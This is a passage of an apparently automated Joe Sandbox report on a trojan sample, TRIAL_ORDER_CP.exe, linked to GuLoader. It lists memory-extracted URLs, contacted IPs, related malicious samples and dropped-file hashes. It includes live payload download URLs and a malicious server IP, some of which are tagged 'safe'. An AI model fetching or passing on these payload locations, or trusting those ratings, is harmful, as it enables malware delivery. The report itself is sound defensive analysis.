          • Avira URL Cloud: safe
          		unknown
          http://www.gopher.ftp://ftp.TRIAL_ORDER_CP.exe, 00000003.00000001.270673846471.0000000000649000.00000020.00000001.01000000.0000000B.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://powerpoint.office.comEMexplorer.exe, 00000007.00000002.275197435549.000000000D413000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272436256660.000000000D413000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://android.notify.windows.com/iOSBexplorer.exe, 00000007.00000000.272439827877.0000000010ED0000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHN8explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://aka.ms/odirmexplorer.exe, 00000007.00000002.275191719232.000000000963E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793812932.000000000963B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009615000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272792772276.0000000009615000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://android.notify.windows.com/iOStore_8wecexplorer.exe, 00000007.00000000.272439827877.0000000010ED0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275201893424.0000000010ED0000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/weather/maps/airqualitystation/in-Washington%2CDistrict-of-Columbia?loc=eyexplorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdTRIAL_ORDER_CP.exe, 00000003.00000001.270673846471.00000000005F2000.00000020.00000001.01000000.0000000B.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMkZ-darkexplorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://ntp.msn.com/edge/ntp?cm=en-us&ocid=widgetonlockscreenwin10&cvid=6c321c39-81be-4f44-a39d-6068explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://windows.msn.com:443/shell?osLocale=en-US&chosenMarketReason=ImplicitNewexplorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://youtu.be/1uIizdaJhMIexplorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/entertainment/news/the-best-big-bang-theory-episode-of-all-time-according-explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://android.notify.wyexplorer.exe, 00000007.00000002.275201893424.0000000010ED0000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Condition/AAehwh2.pngexplorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214TRIAL_ORDER_CP.exe, 00000003.00000001.270673846471.0000000000649000.00000020.00000001.01000000.0000000B.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Condition/explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/news/politics/new-trump-indictment-loses-some-allegations-related-to-jan-6explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://api.msn.com:443/v1/news/Feed/Windows?$explorer.exe, 00000007.00000000.272432151244.0000000009886000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272794146189.0000000009886000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275192124722.0000000009886000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Alert/Alert_AQ_Y.svgexplorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gyym-darkexplorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fgwmexplorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/money/companies/another-popular-ice-cream-brand-files-for-chapter-11-bankrexplorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://windows.msn.com:443/shellv2?osLocale=en-US&chosenMarketReason=ImplicitNewexplorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/money/companies/elon-musk-s-strange-new-rule-for-x-employees-could-cause-texplorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/play/games/idle-mining-explorer.exe, 00000007.00000003.272792772276.00000000095B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://word.office.comexplorer.exe, 00000007.00000002.275199213617.000000000D7CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437830122.000000000D7CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275191883367.00000000096D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272432020517.00000000096D8000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://assets.msn.com/weathermapdata/1/static/finance/taskbar/icons/earnings/svg/light/blue.svgexplorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://android.notify.windows.com/iOSyb3d8bbwexplorer.exe, 00000007.00000000.272439827877.0000000010ED0000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/lifestyle/cleaning-and-organizing/the-common-household-ingredient-that-canexplorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://sz.zxg6.za.com/.ex/ELFyaa85.binAwarTrowww.kapiextra.com/ELFyaa85.binTRIAL_ORDER_CP.exe, 00000003.00000002.270971425091.0000000032F40000.00000004.00001000.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/entertainment/news/best-movies-now-on-netflix/ss-BB1qpNv8explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA12QGB8explorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://api.msn.com/v1/news/Feed/Windows?=explorer.exe, 00000007.00000002.275196926066.000000000D2EF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272435776425.000000000D2EF000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/weather/maps/severeweather/in-Washington%2CDistrict-of-Columbia?loc=eyJsIjexplorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://nsis.sf.net/NSIS_ErrorErrorTRIAL_ORDER_CP.exefalse
          • Avira URL Cloud: safe
          		unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fgwm-darkexplorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.foreca.comexplorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://outlook.comexplorer.exe, 00000007.00000002.275199213617.000000000D7CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437830122.000000000D7CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275191883367.00000000096D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272432020517.00000000096D8000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/tv/news/cexplorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/eexplorer.exe, 00000007.00000000.272431518007.00000000094FD000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Alert/Alert_TH_Y.svgexplorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gDrC-darkexplorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/entertainment/news/the-28-most-dazzling-red-carpet-beauty-looks-ever/ss-AAexplorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/play/games/farm-merge-valley/cg-9nf2hg8fnltsexplorer.exe, 00000007.00000000.272431518007.00000000094FD000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://wealthofgeeks.com/the-best-tv-anti-heroes/explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://api.msn.com/v1/news/Feed/Windows?activityId=409F83E3643B46AFA5176A6D0817A617&timeOut=5000&ocexplorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/ePexplorer.exe, 00000007.00000002.275191203436.00000000094D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.00000000094D0000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/20240402.1/Weather/W33_Cleaexplorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Condition/AAehwh2.svgexplorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://excel.office.comSexplorer.exe, 00000007.00000002.275199213617.000000000D7CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437830122.000000000D7CF000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://android.notify.windows.com/iOSXboxGamewexplorer.exe, 00000007.00000000.272439827877.0000000010ED0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275201893424.0000000010ED0000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/weather/forecast/in-Washington%2CDistrict-of-Columbia?loc=eyJsIjoiV2FzaGluexplorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://android.notify.windows.com/iOSexplorer.exe, 00000007.00000000.272439827877.0000000010ED0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275201893424.0000000010ED0000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/health/medical/the-slow-and-steady-growth-of-trilobites/ar-AA1lcBT3explorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/sports/motorsports/travis-kelce-buys-an-ownership-stake-in-a-racehorse-namexplorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000007.00000002.275200497819.000000000D9D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272438693849.000000000D9D8000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gRnR-darkexplorer.exe, 00000007.00000000.272431518007.00000000094D0000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdTRIAL_ORDER_CP.exe, 00000003.00000001.270673846471.00000000005F2000.00000020.00000001.01000000.0000000B.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppQexplorer.exe, 00000007.00000002.275200497819.000000000D9D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272438693849.000000000D9D8000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Alert/Alert_AQ_Y.pngexplorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHN8-darkexplorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://api.msn.com/explorer.exe, 00000007.00000003.272794146189.00000000097E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275192124722.000000000978A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272432151244.000000000978A000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/health/yogapilates/biden-admin-can-t-force-electric-vehicle-goals-robert-wexplorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://sz.zxg6.za.com/.ex/ELFyaa85.binJTRIAL_ORDER_CP.exe, 00000003.00000002.270960579631.0000000003809000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gDrCexplorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com:443/en-us/feedexplorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://people.com/jim-parsons-reprising-big-bang-theory-role-is-a-gift-exclusive-8647240explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/foodanddrink/foodnews/30-photos-of-super-nostalgic-things-that-ll-bring-baexplorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/play/games/rally-champion/cg-9pmdcq52j3hjexplorer.exe, 00000007.00000000.272431518007.00000000094FD000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gyymexplorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/news/us/eight-seconds-KDexplorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown

          World Map of Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public IPs

          IPDomainCountryFlagASNASN NameMalicious
          38.242.218.41
          		sz.zxg6.za.comUnited States
          		36336NATIXISUSfalse

          General Information

          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1500398
          Start date and time:2024-08-28 12:22:10 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 17m 8s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
          Run name:Suspected Instruction Hammering
          Number of analysed new started processes analysed:6
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:2
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:TRIAL_ORDER_CP.exe
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@5/13@1/1
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 60%
          • Number of executed functions: 56
          • Number of non-executed functions: 272
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

          Warnings

          • Exclude process from analysis (whitelisted): dllhost.exe, backgroundTaskHost.exe
          • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
          • Report creation exceeded maximum time and may have missing disassembly code information.
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtEnumerateKey calls found.
          • Report size getting too big, too many NtOpenKey calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtSetInformationFile calls found.
          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

          Simulations

          Behavior and APIs

          TimeTypeDescription
          06:26:16API Interceptor11411630x Sleep call for process: Robocopy.exe modified

          Joe Sandbox View / Context

          IPs

          No context

          Domains

          No context

          ASNs

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          NATIXISUShttps://ap.gstudio.one/index.php/lists/lw689m5b1xac4/unsubscribe/te8165ggfzbed/dg88530l326d5/unsubscribe-directGet hashmaliciousUnknownBrowse
          • 38.242.226.154
          jzXBbfutn2.elfGet hashmaliciousUnknownBrowse
          • 38.242.104.226
          38-drop.elfGet hashmaliciousUnknownBrowse
          • 38.242.144.29
          GF87654456789900..DOC.exeGet hashmaliciousRemcos, DBatLoaderBrowse
          • 38.242.255.115
          Enquiry 220062.exeGet hashmaliciousRemcos, DBatLoaderBrowse
          • 38.242.255.115
          mhJTEU0jTIDARYr.exeGet hashmaliciousAgentTeslaBrowse
          • 38.242.240.108
          436162.xlsGet hashmaliciousDBatLoaderBrowse
          • 38.242.255.115
          2zA63r22hAWM5UI.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
          • 38.242.240.108
          nwuV7k6gVrstx33.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
          • 38.242.240.108
          z13.exeGet hashmaliciousAgentTeslaBrowse
          • 38.242.240.108

          JA3 Fingerprints

          No context

          Dropped Files

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          C:\Users\user\AppData\Local\Temp\nsl154E.tmp\LangDLL.dllThermo Fisher RFQ_TFS-1805.xlsGet hashmaliciousGuLoaderBrowse
            FedEx Shipping Confirmation.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
              IMG_00991ORDER_FILES.exeGet hashmaliciousFormBook, GuLoaderBrowse
                FedEx Shipping Confirmation.exeGet hashmaliciousGuLoaderBrowse
                  IMG_00991ORDER_FILES.exeGet hashmaliciousGuLoaderBrowse
                    SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsxGet hashmaliciousUnknownBrowse
                      C:\Users\user\AppData\Local\Temp\nsl154E.tmp\System.dllThermo Fisher RFQ_TFS-1805.xlsGet hashmaliciousGuLoaderBrowse
                        FedEx Shipping Confirmation.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                          IMG_00991ORDER_FILES.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            FedEx Shipping Confirmation.exeGet hashmaliciousGuLoaderBrowse
                              IMG_00991ORDER_FILES.exeGet hashmaliciousGuLoaderBrowse
                                SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsxGet hashmaliciousUnknownBrowse
                                  AKgHw6grDP.exeGet hashmaliciousGuLoaderBrowse
                                    AKgHw6grDP.exeGet hashmaliciousGuLoaderBrowse
                                      PaymentAdvice_SWIFT _USD39060-AUG-7-070224-000214.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Crumbliness\pressurization.pra

                                        Download File
                                        Process:C:\Users\user\Desktop\TRIAL_ORDER_CP.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):269664
                                        Entropy (8bit):1.2446463566225683
                                        Encrypted:false
                                        SSDEEP:768:3wSokH49c7ZKiDm+1Qer3C4XkGB3luG3fCHoEHKM/yP35tuIJ95oV31XfCp43UtM:55+1GbuKvP32IqV1fmPU0VicgRx
                                        MD5:084CDF1FE8920EACBC8DC0E839D9E5A7
                                        SHA1:5BB2E4E15941AC2AB4287A58F671B82DA5C9A384
                                        SHA-256:A6EB01651C833919FC27F9B7DD2B5C6D9F9DD8766BC7848679B5E664ECC6C8A7
                                        SHA-512:F856C41F540B7BD8233179CC752E63E4C88C1BBC38739B4FAF3DA09675B13FBC0219458AFE95D4C1DD481B35BB69DC9B66C2269C64B106DE3659A51CE9AE1B42
                                        Malicious:false
                                        Reputation:low
                                        Preview:...E.......c...............................0...............................................................c........................................n.......Y................................P..........................................................................................$........................................~.........................1...Z....................................m......................=.......................U............................................[....................................}.=..................-..........................................................t........................-....................m..............V...................................................................q............m.X..................................c....................................................................................'.........................T...R.............................................................^............|................................

                                        C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Crumbliness\restriktivitets.bnk

                                        Download File
                                        Process:C:\Users\user\Desktop\TRIAL_ORDER_CP.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):131403
                                        Entropy (8bit):1.2526174536345023
                                        Encrypted:false
                                        SSDEEP:768:GGj5fMy6uanycN+gN/qEN+bHeC6roJdAGpeBgXU9ZWNAnu/Fkutb:L3l0fDkwaPA
                                        MD5:9AD6681DD2B309E6ACE142096F9E2870
                                        SHA1:5E02434342A98589A29B7E389E88DD4C60F09A8A
